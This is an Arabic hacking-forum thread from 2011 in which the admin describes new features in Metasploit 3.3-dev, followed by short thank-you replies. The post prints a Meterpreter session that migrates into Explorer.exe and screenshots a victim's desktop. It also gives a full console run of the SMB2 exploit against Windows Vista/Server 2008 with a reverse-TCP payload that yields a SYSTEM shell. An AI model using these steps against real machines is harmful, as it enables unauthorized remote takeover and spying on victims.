منتديات الهكرز المتقدم
أهلا وسهلا بك زائرنا الكريم، إذا كانت هذه زيارتك الأولى للمنتدى، فيرجى التكرم بتسجيل
ما إذا رغبت بقراءة المواضيع والإطلاع فتفضل بزيارة القسم الذي ترغب أدناه.
كما يشرفنا أن تقوم بالتسجيل
منتديات الهكرز المتقدم
أهلا وسهلا بك زائرنا الكريم، إذا كانت هذه زيارتك الأولى للمنتدى، فيرجى التكرم بتسجيل
ما إذا رغبت بقراءة المواضيع والإطلاع فتفضل بزيارة القسم الذي ترغب أدناه.
كما يشرفنا أن تقوم بالتسجيل
منتديات الهكرز المتقدم
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتديات الهكرز المتقدم

اتصال بي عبر S corpion
 
الرئيسيةWelcomeأحدث الصورالتسجيلدخول

 

 التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev

اذهب الى الأسفل 
3 مشترك
كاتب الموضوعرسالة
Scorpion
Admin
Admin
Scorpion


عدد المساهمات : 529
نقاط : 3138
السٌّمعَة : 80
تاريخ التسجيل : 15/11/2010
الموقع : www.logsail.c.la

التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev Empty
مُساهمةموضوع: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev   التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev Icon_minitimeالسبت يوليو 09, 2011 8:21 am


تحية لكم ياأعضاء منتديات top-hacker ، اليوم حبيت اعرضلكم بعض التطورات في مشروع الميتاسبلويت ، فبعد اجراء العديد من التطويرات على مشروع ميتا سبلويت منذ الاصدار 3.2 أعلن H.D Moore المطوّر الرئيسي لمشروع الثغرات ميتا سبلويت بتدوينة كتبها بتاريخ البارحة عن بعض الميزات والثغرات الجديدة التي تم تطويرها بالاضافة لتوفير الاصدار 3.3-dev من ميتا سبلويت بشكل حزمة مضغوطة ليتم تحميلها من موقع المشروع.


يعتبر ميتا سبلويت هو مشروع الثغرات الأول في عالم الهاكرز حيث يحتوي ميتا سبلويت على العديد من الثغرات الجهازة للاستغلال عن بعد والتي يتم تحديثها بشكل مستمر بالاضافة للعديد من الأدوات المساعدة التي يستخدمها الهاكرز والـ Penetration Testers في عملهم لتساعدهم على اختبار أمن الشبكة وحماية الأجهزة الموجودة فيها من الثغرات.

من الأمور التي تم الانتهاء من تطويرها هي اضافة امكانية أخذ صورة لسطح مكتب الجهاز الذي تم اختراقه عن طريق استغلال Meterpreter وذلك كما وضّح HDM:


كود:

meterpreter > ps

Process list
============
PID Name Path
--- ---- ----
204 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
[ snipped ]
1736 Explorer.EXE C:\WINDOWS\Explorer.EXE
3348 sol.exe C:\WINDOWS\system32\sol.exe

meterpreter > migrate 1736[*] Migrating to 1736...[*] Migration completed successfully.

meterpreter > screenshot /tmp/boom.bmp[*] Image saved to /tmp/boom.bmp
Opening browser to image.


اما الأمر الثاني والذي أجده مهم جداً هو توفير استغلال للثغرة التي اكتشفت مسبقاً وأصابت خدمة مشاركة الملفات في نظام ويندوز فيستا و ويندوز سيرفر 2008 وحتى ويندوز 7.

عندما كتب ذلك الخبر كان الاستغلال عبارة عن Denial of Service فقط مع وجود احتمال لامكانية تطوير الاستغلال ليصبح Remote Code Execution, يبدو أن مطوري مشروع ****sploit والمساهمين فيه تمكّنوا من تحقيق ذلك وأصبحنا قادرين على استغلال الثغرة السابقة لاختراق الأجهزة التي تعمل بنظام ويندوز VISTA SP1 و VISTA SP2 وحتى Windows Server 2008 عن بعد!!


كود:

msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit
[*] Started reverse handler[*] Connecting to the target (192.168.0.211:445)...[*] Sending the exploit packet (854 bytes)...[*] Waiting up to 180 seconds for exploit to trigger...[*] Sending stage (719360 bytes)[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)

meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
********: en_US

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

يمكننا استخدام الأداة الجديدة التي تم اضافتها للمشروع لفحص الأنظمة التي تستخدم خدمة SMB2 لمشاركة الملفات (الاصدار المستخدم في ويندوز فيستا و ويندوز سيرفر 2008) والتي سنجدها بالمسار التالي:


كود:

auxiliary/scanner/smb/smb2

طبعا هذه ليست الميزات الوحيدة التي تم تطويرها واضافتها للمشروع منذ الاصدار 3.2 فيوجد الكثير من الثغرات, الأدوات والميزات الأخرى تم اضافتها للمشروع خلال تطويره في الفترة السابقة. المشروع مازال قيد التطوير ويحتاج مزيد من الوقت حتى يتم اطلاق الاصدار 3.3 بشكل نهائي لكن من الممكن متابعة مجريات تطوير المشروع أو استخدام أداة SVN لتحديثه ومزامنته بشكل مستمر.


ودمتم سالمين

الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://www.logsail.c.la
AL-3a9rab
هكر مبتدئ
هكر مبتدئ
AL-3a9rab


عدد المساهمات : 30
نقاط : 50
السٌّمعَة : 0
تاريخ التسجيل : 07/04/2011

التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev Empty
مُساهمةموضوع: رد: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev   التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev Icon_minitimeالسبت يوليو 09, 2011 8:32 am

شكرا اخوية والله اشهد انك مبدع
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Scorpion
Admin
Admin
Scorpion


عدد المساهمات : 529
نقاط : 3138
السٌّمعَة : 80
تاريخ التسجيل : 15/11/2010
الموقع : www.logsail.c.la

التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev Empty
مُساهمةموضوع: رد: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev   التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev Icon_minitimeالأربعاء يوليو 20, 2011 11:18 pm

chokran akhi
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://www.logsail.c.la
battgv2020
هكر مبتدئ
هكر مبتدئ



عدد المساهمات : 55
نقاط : 55
السٌّمعَة : 0
تاريخ التسجيل : 21/04/2014

التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev Empty
مُساهمةموضوع: رد: التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev   التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev Icon_minitimeالإثنين أبريل 21, 2014 9:53 am

مشكور يت كبيررررررررر
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» شرح تنصيب الميتاسبلويت على اللنكس
» الشامل في الميتاسبلويت الجزء الاول
» الشامل في الميتاسبلويت الجزء الثاني
» الشامل في الميتاسبلويت الجزء الثالث
» الشامل في الميتاسبلويت الجزء الرابع

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات الهكرز المتقدم :: قسم الإختراق بالميتاسبلوت والإتصال العكسي-
انتقل الى: